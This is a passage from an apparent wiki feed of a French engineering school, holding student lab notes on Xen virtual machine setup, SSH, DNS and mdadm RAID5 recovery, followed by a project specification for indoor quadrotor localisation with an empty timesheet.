                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
créez un RAID5 logiciel avec les trois partitions obtenues (utilisez le paquetage mdadm). Copiez des données sur le RAID5, arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
nous créons le volume /dev/md0:&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
créez un RAID5 logiciel avec les trois partitions obtenues (utilisez le paquetage mdadm)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
///&lt;br /&gt;
&lt;br /&gt;
root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 69.7% (731372/1047552) finish=0.1min speed=29254K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==============&amp;gt;......]  recovery = 71.6% (751212/1047552) finish=0.1min speed=28892K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45702</id>
		<title>P18 Localisation of quadrotors</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45702"/>
				<updated>2017-10-18T09:24:01Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Semaine 3 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Cahier des charges'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Présentation générale du projet&amp;lt;/span&amp;gt;=== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Contexte&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Dans un monde de plus en plus connecté, de nombreux drones sont déployés pour diverses applications comme l'espionnage, la surveillance, la cartographie de lieux et la livraison de colis. Les technologies nécessaires pour contrôler ces drones sont des sujets de recherche actuels. &lt;br /&gt;
&lt;br /&gt;
Le contrôle de ceux-ci passe tout d'abord par la maîtrise de leur position dans l'espace. Le développement des applications liées à l'utilisation de drones nécessite un travail important sur la localisation spatiale d'objets connectés. &lt;br /&gt;
&lt;br /&gt;
De plus, dans un souci d'utilisation, il est essentiel de développer des interfaces logicielles permettant d'exploiter ces données.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Objectif du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce projet est de développer une interface logicielle permettant de traiter en temps réel les informations de localisation d'un drone et de balises, dans le but de définir leur localisation dans l'espace, en intérieur.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Description du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le contrôle de drones, la première étape importante est de donner ses informations de position. Le but du projet est de développer une interface logicielle permettant de localiser le drone en temps réel en intérieur. Le drone se déplace dans un environnement dans lequel ont été installées de multiples balises. Il est équipé d'une carte, lui permettant de recevoir les distances relatives entre lui-même et les balises, sur laquelle différents algorithmes vont être implémentés pour effectuer la localisation en temps réel. Le projet requiert des compétences en développement hardware (Crazyflie 2.0, voir https://wiki.bitcraze.io/) et software (langage C/C++/Python/Javascript/HTML...).&lt;br /&gt;
&lt;br /&gt;
Il se divise en 4 étapes principales, qui sont:&lt;br /&gt;
*1) Choisir les technologies utilisées&lt;br /&gt;
*2) Choisir l'architecture (OS / APIs)&lt;br /&gt;
*3) Développer les différentes parties du projet&lt;br /&gt;
*4) Intégrer et connecter les différentes parties du projet&lt;br /&gt;
&lt;br /&gt;
La localisation étant en intérieur, le protocole GPS n'est donc pas assez précis pour les applications ciblées. La mise en place d'un tel dispositif permettrait grâce à l'utilisation d'un algorithme d'estimer avec une bonne précision les positions en intérieur d'une balise centrale (appelée Tag) et de balises (appelées Anchor). Le Tag scanne en temps réel la distance relative aux différentes balises, et il nous est retourné la position des balises et du Tag grâce à l'algorithme de localisation.&lt;br /&gt;
&lt;br /&gt;
Le projet se compose de 3 parties:&lt;br /&gt;
* Collect &amp;amp; parse: collecter les données envoyées par les balises en communiquant avec un serveur et récupérer les données adéquates par un tri&lt;br /&gt;
* Localise: déterminer la matrice de position des balises et du Tag en traitant les données récupérées&lt;br /&gt;
* Display: développer l'interface homme machine pour afficher, étudier et utiliser les données traitées&lt;br /&gt;
&lt;br /&gt;
Nous travaillerons dans un premier temps dans une optique temps différé avant de travailler en temps réel. Cela nous permettra d'acquérir des données utiles et réutilisables en aval. &lt;br /&gt;
&lt;br /&gt;
A l'aboutissement du projet, nous devrions être capable via l'interface homme machine développée d'afficher précisément la position spatiale des balises ainsi que du Tag, grâce àl'utilisation d'un algorithme de localisation et des données récupérées, et d'afficher d'autres données relatives au déplacement du Tag ou des balises dans l'espace. &lt;br /&gt;
&lt;br /&gt;
Si le temps le permet, nous pourrons aussi être amenés à adapter et utiliser l'interface développée pour l'utilisation d'un drone.&lt;br /&gt;
&lt;br /&gt;
''Sujet originel''&lt;br /&gt;
&lt;br /&gt;
To achieve the control of quadrotors, the first important task to give its position information. This project is to develop a software(GUI) to localize the quadrotors in real-time. The quadrotor is flying in an environment where several transmitters have been installed. The quadrotor is equipped with a deck to receive the relative distances between the deck and all transmitters, based on which different algorithms will be implemented to realize the real-time localization. The candidates need to have both experiences on hardware (Crazyflie 2.0, see https://wiki.bitcraze.io/) and software development (C/C , Python…). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Calendrier&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
''[[Avant le 29/09/17]]'' - Élaboration du Cahier des charges, de la liste des tâches et du calendrier prévisionnel&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Octobre]]'' - Serveur de collecte et début du développement de l'interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Décembre]]'' - Interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[A la fin du PFE]]'' - Intégration finale des différentes parties (Serveur de collecte des données &amp;amp; Serveur de localisation &amp;amp; Interface logicielle)&lt;br /&gt;
&lt;br /&gt;
Répartition du volume de travail (***h):&lt;br /&gt;
&lt;br /&gt;
* Recherche sur les technologies à utiliser (**h)&lt;br /&gt;
* Développement du serveur de collecte de données (**h)&lt;br /&gt;
* Réalisation de l'interface logicielle (Web//Logiciel/Application) (**h)&lt;br /&gt;
* Intégration des différentes parties (**h)&lt;br /&gt;
* Test et débuggage (**h)&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix techniques : matériel et logiciel&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Afin de développer ce dispositif, nous allons utiliser une Raspberry Pi 3 associée à une carte réceptrice, qui communique avec 4 balises composées chacune d'un microcontrôleur et d'une carte émettrice radio (UWB5C) et alimentées par batteries. La carte réceptrice joue le rôle du drone à localiser et communiquera les données émises par les balises vers l'ordinateur via Bluetooth.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix technologiques&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Voici les technologies que nous utilisons pour chacune des parties de ce projet.&lt;br /&gt;
&lt;br /&gt;
    1) Serveur de collecte des données:&lt;br /&gt;
       Scanne et parse les données récupérées pour fournir la matrice D des distances relatives du tag aux 4 balises&lt;br /&gt;
        - API&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    2) Serveur de localisation (fourni):&lt;br /&gt;
       Calcule grâce à l'algorithme de localisation et la matrice D les positions spatiales des 4 noeuds et du tag&lt;br /&gt;
        - API&lt;br /&gt;
        - Bootstrap&lt;br /&gt;
        - Jquery&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    3) Interface utilisateur:&lt;br /&gt;
       Affiche courbes, visualisation 3D, boutons ou données des fichiers envoyées par le serveur de localisation&lt;br /&gt;
        - HTML5 / Javascript&lt;br /&gt;
        - Fichiers JSON (serveurs de collecte et de localisation)&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Calendrier prévisionnel'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Liste des tâches à effectuer&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
# Se documenter sur le projet&lt;br /&gt;
##Langages et technologies utilisées&lt;br /&gt;
##Matériel utilisé&lt;br /&gt;
##Mettre en place du travail sur le Git&lt;br /&gt;
# Réaliser le serveur de collecte&lt;br /&gt;
##Récupérer les trames envoyées par bluetooth par le TAG via la Raspberry Pi&lt;br /&gt;
##Intégrer le serveur de localisation pour interpréter les trames&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
# Réaliser l'interface Web utilisateur&lt;br /&gt;
##Implémenter le serveur de collecte et de localisation&lt;br /&gt;
##Afficher et traiter les données stockées dans les fichiers JSON via le serveur (temps différé + temps réel)&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Feuille d'heures'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Tâche !! Prélude !! Heures S1 !! Heures S2 !! Heures S3 !! Heures S4 !! Heures S5 !! Heures S6 !! Heures S7 !! Heures S8 !! Heures S9 !! Heures S10 !! Heures S11 !! Heures S12 !! Après Noël !! Total&lt;br /&gt;
|-&lt;br /&gt;
| Cahier des charges / Wiki / Gitlab&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur les technos utilisées&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur le matériel&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement du serveur de collecte&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement de l'interface Web&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et intégration du serveur de localisation&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Intégration des différentes parties&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Tests et débuggage&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Optimisation/Correction des programmes&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
